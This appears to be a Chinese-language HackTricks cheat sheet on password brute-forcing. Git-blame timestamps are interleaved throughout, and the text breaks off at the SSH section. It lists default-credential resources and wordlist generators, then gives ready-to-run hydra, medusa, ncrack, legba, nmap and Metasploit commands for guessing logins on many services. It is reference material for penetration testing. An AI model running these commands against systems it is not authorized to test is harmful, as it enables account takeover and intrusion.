2024-04-16 03:24:30 +00:00
# 暴力破解 - 速查表
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-05-06 11:08:56 +00:00
使用 [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) 来轻松构建和**自动化工作流**,使用世界上**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
2024-05-06 11:08:56 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2022-08-31 22:35:39 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-05-06 11:08:56 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-04-16 03:24:30 +00:00
支持 HackTricks 的其他方式:
2023-12-30 12:15:15 +00:00
2024-05-06 11:08:56 +00:00
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )** 上关注我们**。
* 通过向 [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来**分享您的黑客技巧**。
2022-04-28 16:01:33 +00:00
< / details >
2024-05-06 11:08:56 +00:00
## 默认凭据
2020-07-15 15:43:14 +00:00
2024-05-06 11:08:56 +00:00
在谷歌中搜索正在使用的技术的默认凭据,或者**尝试这些链接**:
2020-07-15 15:43:14 +00:00
2021-05-31 09:39:02 +00:00
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet** ](https://github.com/ihebski/DefaultCreds-cheat-sheet )
* [**http://www.phenoelit.org/dpl/dpl.html** ](http://www.phenoelit.org/dpl/dpl.html )
* [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm** ](http://www.vulnerabilityassessment.co.uk/passwordsC.htm )
* [**https://192-168-1-1ip.mobi/default-router-passwords-list/** ](https://192-168-1-1ip.mobi/default-router-passwords-list/ )
* [**https://datarecovery.com/rd/default-passwords/** ](https://datarecovery.com/rd/default-passwords/ )
* [**https://bizuns.com/default-passwords-list** ](https://bizuns.com/default-passwords-list )
* [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv** ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv )
* [**https://github.com/Dormidera/WordList-Compendium** ](https://github.com/Dormidera/WordList-Compendium )
* [**https://www.cirt.net/passwords** ](https://www.cirt.net/passwords )
2021-11-24 15:00:38 +00:00
* [**http://www.passwordsdatabase.com/** ](http://www.passwordsdatabase.com )
2022-04-05 22:24:52 +00:00
* [**https://many-passwords.github.io/** ](https://many-passwords.github.io )
2023-04-15 21:35:06 +00:00
* [**https://theinfocentric.com/** ](https://theinfocentric.com/ )
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:30 +00:00
## **创建您自己的字典**
2020-07-15 15:43:14 +00:00
2024-05-06 11:08:56 +00:00
尽可能多地了解目标的信息,并生成自定义字典。可能有所帮助的工具:
2024-04-06 18:13:07 +00:00
2024-04-16 03:24:30 +00:00
### Crunch
2020-11-30 15:34:43 +00:00
```bash
2020-07-15 15:43:14 +00:00
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%
```
2024-04-16 03:24:30 +00:00
### Cewl
2024-05-06 11:08:56 +00:00
Cewl是一个用于生成自定义字典的工具。
2020-07-15 15:43:14 +00:00
```bash
cewl example.com -m 5 -w words.txt
```
2024-04-16 03:24:30 +00:00
### [CUPP](https://github.com/Mebus/cupp)
2020-11-03 11:04:12 +00:00
2024-05-06 11:08:56 +00:00
根据对受害者的了解(姓名、日期等)生成密码
2021-11-24 15:00:38 +00:00
```
2020-11-03 11:04:12 +00:00
python3 cupp.py -h
```
2024-04-16 03:24:30 +00:00
### [Wister](https://github.com/cycurity/wister)
2023-04-15 21:35:06 +00:00
2024-05-05 22:03:00 +00:00
一个单词列表生成工具,允许您提供一组单词,从给定的单词中创建多个变体,生成一个独特且理想的单词列表,以用于特定目标。
2023-04-15 21:35:06 +00:00
```bash
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
2023-08-03 19:12:22 +00:00
__ _______ _____ _______ ______ _____
\ \ / /_ _|/ ____ |__ __ | ____ | __ \
\ \ /\ / / | | | (___ | | | |__ | |__) |
\ \/ \/ / | | \___ \ | | | __ | | _ /
\ /\ / _| |_ ____ ) | | | | |____| | \ \
\/ \/ |_____|_____/ |_| |______|_| \_\
Version 1.0.3 Cycurity
2023-04-15 21:35:06 +00:00
Generating wordlist...
[########################################] 100%
Generated 67885 lines.
Finished in 0.920s.
```
2024-04-16 03:24:30 +00:00
### [pydictor](https://github.com/LandGrey/pydictor)
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:30 +00:00
### 字典列表
2020-07-15 15:43:14 +00:00
2021-05-31 09:39:02 +00:00
* [**https://github.com/danielmiessler/SecLists** ](https://github.com/danielmiessler/SecLists )
* [**https://github.com/Dormidera/WordList-Compendium** ](https://github.com/Dormidera/WordList-Compendium )
* [**https://github.com/kaonashi-passwords/Kaonashi** ](https://github.com/kaonashi-passwords/Kaonashi )
2023-04-15 21:35:06 +00:00
* [**https://github.com/google/fuzzing/tree/master/dictionaries** ](https://github.com/google/fuzzing/tree/master/dictionaries )
2021-05-31 09:39:02 +00:00
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm** ](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm )
2023-04-15 21:35:06 +00:00
* [**https://weakpass.com/wordlist/** ](https://weakpass.com/wordlist/ )
* [**https://wordlists.assetnote.io/** ](https://wordlists.assetnote.io/ )
* [**https://github.com/fssecur3/fuzzlists** ](https://github.com/fssecur3/fuzzlists )
* [**https://hashkiller.io/listmanager** ](https://hashkiller.io/listmanager )
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists** ](https://github.com/Karanxa/Bug-Bounty-Wordlists )
2020-07-15 15:43:14 +00:00
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-05-06 11:08:56 +00:00
使用 [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) 可轻松构建和**自动化工作流程**,利用全球**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
2024-05-06 11:08:56 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2022-08-31 22:35:39 +00:00
2024-04-16 03:24:30 +00:00
## 服务
2020-07-15 15:43:14 +00:00
2024-02-06 03:43:18 +00:00
按服务名称按字母顺序排列。
2020-07-15 15:43:14 +00:00
```bash
nmap -p 548 --script afp-brute < IP >
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE < PATH_PASSWDS >
msf> set USER_FILE < PATH_USERS >
msf> run
```
2024-04-16 03:24:30 +00:00
### AJP
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
AJP (Apache JServ Protocol) is a binary protocol that can be used to proxy requests from a web server to a Java application server. It is often used in combination with Apache Tomcat. AJP can be vulnerable to attacks such as brute force, so it is important to secure AJP configurations properly.
2020-07-15 15:43:14 +00:00
```bash
nmap --script ajp-brute -p 8009 < IP >
```
2024-05-06 11:08:56 +00:00
## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)
## AMQP( ActiveMQ, RabbitMQ, Qpid, JORAM和Solace)
2023-12-26 21:49:09 +00:00
```bash
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
```
2024-04-16 03:24:30 +00:00
### Cassandra
2024-02-06 03:43:18 +00:00
2024-05-05 22:03:00 +00:00
卡桑德拉
2020-07-15 15:43:14 +00:00
```bash
nmap --script cassandra-brute -p 9160 < IP >
2023-12-26 21:49:09 +00:00
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### CouchDB
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
CouchDB是一个开源的NoSQL数据库管理系统, 可以使用Brute Force攻击来尝试破解密码。Brute Force攻击是一种尝试所有可能的密码组合直到找到正确密码的方法。攻击者可以使用各种工具和脚本来自动化这一过程。为了防止Brute Force攻击, 建议使用强大且复杂的密码, 并实施账户锁定机制以限制尝试次数。
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/couchdb/couchdb_login
2021-01-03 00:43:09 +00:00
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
```
2024-04-16 03:24:30 +00:00
### Docker Registry
2024-02-06 03:43:18 +00:00
2024-04-16 03:24:30 +00:00
### Docker注册表
2021-11-24 15:00:38 +00:00
```
2021-01-03 00:43:09 +00:00
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
2020-07-17 23:59:16 +00:00
```
2024-04-16 03:24:30 +00:00
### Elasticsearch
2024-02-06 03:43:18 +00:00
2024-04-16 03:24:30 +00:00
### Elasticsearch
2021-11-24 15:00:38 +00:00
```
2021-01-03 00:43:09 +00:00
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### FTP
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
FTP( File Transfer Protocol) 是一种用于在网络上传输文件的标准协议。
2020-07-15 15:43:14 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > ftp
ncrack -p 21 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M ftp
2023-12-26 21:49:09 +00:00
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### HTTP 通用暴力破解
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:30 +00:00
#### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md)
2020-07-15 15:43:14 +00:00
2024-05-05 22:03:00 +00:00
### HTTP 基本身份验证
2020-07-15 15:43:14 +00:00
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
2022-09-12 15:29:22 +00:00
# Use https-get mode for https
2020-07-15 15:43:14 +00:00
medusa -h < IP > -u < username > -P < passwords.txt > -M http -m DIR:/path/to/auth -T 10
2023-12-26 21:49:09 +00:00
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### HTTP - NTLM
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
### HTTP - NTLM
2023-12-26 21:49:09 +00:00
```bash
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
```
2024-05-06 11:08:56 +00:00
### HTTP - Post Form
2024-04-16 03:24:30 +00:00
### HTTP - 提交表单
2020-07-15 15:43:14 +00:00
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^& password=^PASS^& enter=Sign+in:Login name or password is incorrect" -V
2022-09-12 15:29:22 +00:00
# Use https-post-form mode for https
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
对于http**s**,您必须从"http-post-form"更改为"**https-post-form**"
2024-04-06 18:13:07 +00:00
2024-04-16 03:24:30 +00:00
### **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle
2020-07-15 15:43:14 +00:00
```bash
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
2023-12-26 21:49:09 +00:00
# Check also https://github.com/evilsocket/legba/wiki/HTTP
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### IMAP
2024-04-06 18:13:07 +00:00
2024-05-06 11:08:56 +00:00
IMAP (Internet Message Access Protocol) is a standard email protocol that stores email messages on a mail server. When a hacker performs a brute-force attack on an IMAP server, they try to gain unauthorized access by systematically trying all possible combinations of usernames and passwords until the correct one is found. This is a common technique used by hackers to compromise email accounts.
2023-12-26 21:49:09 +00:00
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f < IP > imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f < IP > imap -V
nmap -sV --script imap-brute -p < PORT > < IP >
legba imap --username user --password data/passwords.txt --target localhost:993
```
2024-04-16 03:24:30 +00:00
### IRC
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
IRC( Internet Relay Chat) 是一种实时互联网通信协议, 用于通过文本进行多人聊天。
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p < PORT > < IP >
```
2024-04-16 03:24:30 +00:00
### ISCSI
2024-02-06 03:43:18 +00:00
2024-04-16 03:24:30 +00:00
### ISCSI
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 < IP >
```
2024-04-16 03:24:30 +00:00
### JWT
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
JSON Web Tokens( JWT) 是一种开放标准( RFC 7519) , 用于在各方之间安全地传输信息。 JSON Web Tokens 可以通过数字签名验证和加密来验证信息的完整性。
2021-03-08 16:25:26 +00:00
```bash
#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt < JWT token >
#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
```
2024-04-16 03:24:30 +00:00
### LDAP
2024-02-06 03:43:18 +00:00
2024-04-16 03:24:30 +00:00
LDAP( 轻型目录访问协议) 是一种用于访问和维护分布式目录信息服务的协议。
2020-07-15 15:43:14 +00:00
```bash
nmap --script ldap-brute -p 389 < IP >
2023-12-26 21:49:09 +00:00
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords .txt --ldap-domain example.org --single-match
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### MQTT
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
MQTT( Message Queuing Telemetry Transport) 是一种轻量级的发布/订阅通信协议,常用于物联网设备之间的通信。
2022-02-19 19:42:58 +00:00
```
ncrack mqtt://127.0.0.1 --user test – P /root/Desktop/pass.txt -v
2023-12-26 21:49:09 +00:00
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
2022-02-19 19:42:58 +00:00
```
2024-04-16 03:24:30 +00:00
### Mongo
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script mongodb-brute -n -p 27017 < IP >
use auxiliary/scanner/mongodb/mongodb_login
2023-12-26 21:49:09 +00:00
legba mongodb --target localhost:27017 --username root --password data/passwords.txt
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### MSSQL
2023-08-03 19:12:22 +00:00
2024-05-06 11:08:56 +00:00
#### MSSQL
MSSQL是一种常见的关系型数据库管理系统。在渗透测试中, 可以使用暴力破解技术来尝试破解MSSQL数据库的凭据。暴力破解是一种尝试所有可能的用户名和密码组合, 直到找到正确凭据的方法。
2023-12-26 21:49:09 +00:00
```bash
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
```
2024-04-16 03:24:30 +00:00
### MySQL
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
MySQL 是一种流行的关系型数据库管理系统, 常用于Web应用程序。
2020-07-15 15:43:14 +00:00
```bash
2021-11-21 17:03:07 +00:00
# hydra
2020-07-15 15:43:14 +00:00
hydra -L usernames.txt -P pass.txt < IP > mysql
2021-11-21 17:03:07 +00:00
# msfconsole
2020-07-15 15:43:14 +00:00
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
2021-11-21 17:03:07 +00:00
# medusa
medusa -h < IP / Host > -u < username > -P < password_list > < -f | to stop medusa on first success attempt > -t < threads > -M mysql
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
```
2024-04-16 03:24:30 +00:00
### OracleSQL
2024-02-06 03:43:18 +00:00
2024-04-16 03:24:30 +00:00
### OracleSQL
2020-07-15 15:43:14 +00:00
```bash
patator oracle_login sid=< SID > host=< IP > user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS < IP >
msf> set RPORT 1521
msf> set SID < SID >
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS < IP >
msf> set RPORTS 1521
msf> set SID < SID >
2022-09-12 15:29:22 +00:00
#for some reason nmap fails sometimes when executing this script
2020-07-15 15:43:14 +00:00
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=< SID > < IP >
2023-12-26 21:49:09 +00:00
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
为了使用**oracle\_login**与**patator**,您需要**安装**:
2020-07-15 15:43:14 +00:00
```bash
pip3 install cx_Oracle --upgrade
```
2024-04-16 03:24:30 +00:00
[离线 OracleSQL 哈希暴力破解 ](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force )( **版本 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** 和 **11.2.0.3** ) :
2020-07-15 15:43:14 +00:00
```bash
2023-08-03 19:12:22 +00:00
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
2020-07-15 15:43:14 +00:00
```
2024-05-05 22:03:00 +00:00
### 暴力破解
2020-07-15 15:43:14 +00:00
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f < IP > pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f < IP > pop3 -V
2023-12-26 21:49:09 +00:00
# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
```
2024-04-16 03:24:30 +00:00
### PostgreSQL
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
PostgreSQL是一种流行的开源关系型数据库管理系统。
2020-07-15 15:43:14 +00:00
```bash
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > postgres
medusa -h < IP > – U /root/Desktop/user.txt – P /root/Desktop/pass.txt – M postgres
ncrack – v – U /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > :5432
patator pgsql_login host=< IP > user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 < IP >
2023-12-26 21:49:09 +00:00
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### PPTP
2020-07-15 15:43:14 +00:00
2024-02-06 03:43:18 +00:00
您可以从[https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)下载`.deb`软件包进行安装。
2020-07-15 15:43:14 +00:00
```bash
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter – u < Username > < IP >
```
2024-04-16 03:24:30 +00:00
### RDP
2024-04-06 18:13:07 +00:00
2024-05-06 11:08:56 +00:00
RDP( Remote Desktop Protocol) 是一种用于远程访问和控制计算机的协议。
2020-07-15 15:43:14 +00:00
```bash
ncrack -vv --user < User > -P pwds.txt rdp://< IP >
hydra -V -f -L < userslist > -P < passwlist > rdp://< IP >
2023-12-26 21:49:09 +00:00
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain < RDP_DOMAIN > ] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### Redis
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
Redis是一个流行的开源内存数据库, 通常用于缓存、会话存储和消息代理。Redis数据库通常受到暴力破解攻击的威胁, 因此需要采取一些措施来保护它。
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 < IP >
2021-08-27 00:14:28 +00:00
hydra – P /path/pass.txt redis://< IP > :< PORT > # 6379 is the default
2023-12-26 21:49:09 +00:00
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### Rexec
2020-07-15 15:43:14 +00:00
2024-05-06 11:08:56 +00:00
Rexec是一种用于在远程系统上执行命令的协议。
2020-07-15 15:43:14 +00:00
```bash
hydra -l < username > -P < password_file > rexec://< Victim-IP > -v -V
```
2024-04-16 03:24:30 +00:00
### Rlogin
2020-07-15 15:43:14 +00:00
2024-05-06 11:08:56 +00:00
Rlogin( 远程登录) 是一种基于文本的远程登录协议, 通常用于在网络上远程登录到另一台计算机。
2023-12-26 21:49:09 +00:00
```bash
hydra -l < username > -P < password_file > rlogin://< Victim-IP > -v -V
```
2024-04-16 03:24:30 +00:00
### Rsh
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
Rsh( 远程shell) 是一种基于文本的远程登录协议, 可用于在网络上执行命令。由于其不加密的特性, Rsh协议容易受到中间人攻击。
2020-07-15 15:43:14 +00:00
```bash
hydra -L < Username_list > rsh://< Victim_IP > -v -V
```
2024-02-06 03:43:18 +00:00
[http://pentestmonkey.net/tools/misc/rsh-grind ](http://pentestmonkey.net/tools/misc/rsh-grind )
2024-04-16 03:24:30 +00:00
### Rsync
2024-04-06 18:13:07 +00:00
2024-04-16 03:24:30 +00:00
### Rsync
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 < IP >
```
2024-04-16 03:24:30 +00:00
### RTSP
2023-12-30 12:15:15 +00:00
2024-04-16 03:24:30 +00:00
### RTSP
2023-12-26 21:49:09 +00:00
```bash
hydra -l root -P passwords.txt < IP > rtsp
```
2024-04-16 03:24:30 +00:00
### SFTP
2023-12-26 21:49:09 +00:00
```bash
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
```
2024-04-16 03:24:30 +00:00
### SNMP
2024-02-06 03:43:18 +00:00
2024-04-16 03:24:30 +00:00
### SNMP
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute < target > [--script-args snmp-brute.communitiesdb=< wordlist > ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt < IP >
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```
2024-04-16 03:24:30 +00:00
### SMB
2024-04-06 18:13:07 +00:00
2024-05-06 11:08:56 +00:00
SMB( Server Message Block) 是一种用于在计算机之间共享文件、打印机和其他资源的网络通信协议。
2020-07-15 15:43:14 +00:00
```bash
nmap --script smb-brute -p 445 < IP >
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
2023-12-26 21:49:09 +00:00
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup < SMB_WORKGROUP > ] [--smb-share < SMB_SHARE > ]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### SMTP
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
Simple Mail Transfer Protocol( 简单邮件传输协议)
2020-07-15 15:43:14 +00:00
```bash
hydra -l < username > -P /path/to/passwords.txt < IP > smtp -V
hydra -l < username > -P /path/to/passwords.txt -s 587 < IP > -S -v -V #Port 587 for SMTP with SSL
2023-12-26 21:49:09 +00:00
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism < mech > ]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### SOCKS
2024-02-06 03:43:18 +00:00
2024-04-16 03:24:30 +00:00
### SOCKS
2021-05-13 16:02:48 +00:00
```bash
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 < IP >
2023-12-26 21:49:09 +00:00
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
```
2024-04-16 03:24:30 +00:00
### SQL Server
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
SQL Server是一种流行的关系型数据库管理系统( RDBMS) , 由Microsoft开发。它使用结构化查询语言( SQL) 来管理和操作数据库。 SQL Server是许多组织和企业中常用的数据库解决方案之一。
2023-12-26 21:49:09 +00:00
```bash
#Use the NetBIOS name of the machine as domain
crackmapexec mssql < IP > -d < Domain Name > -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > mssql
medusa -h < IP > – U /root/Desktop/user.txt – P /root/Desktop/pass.txt – M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts < host > #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
2021-05-13 16:02:48 +00:00
```
2024-04-16 03:24:30 +00:00
### SSH
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
SSH( Secure Shell) 是一种加密网络协议, 用于通过网络安全地访问和管理远程计算机。
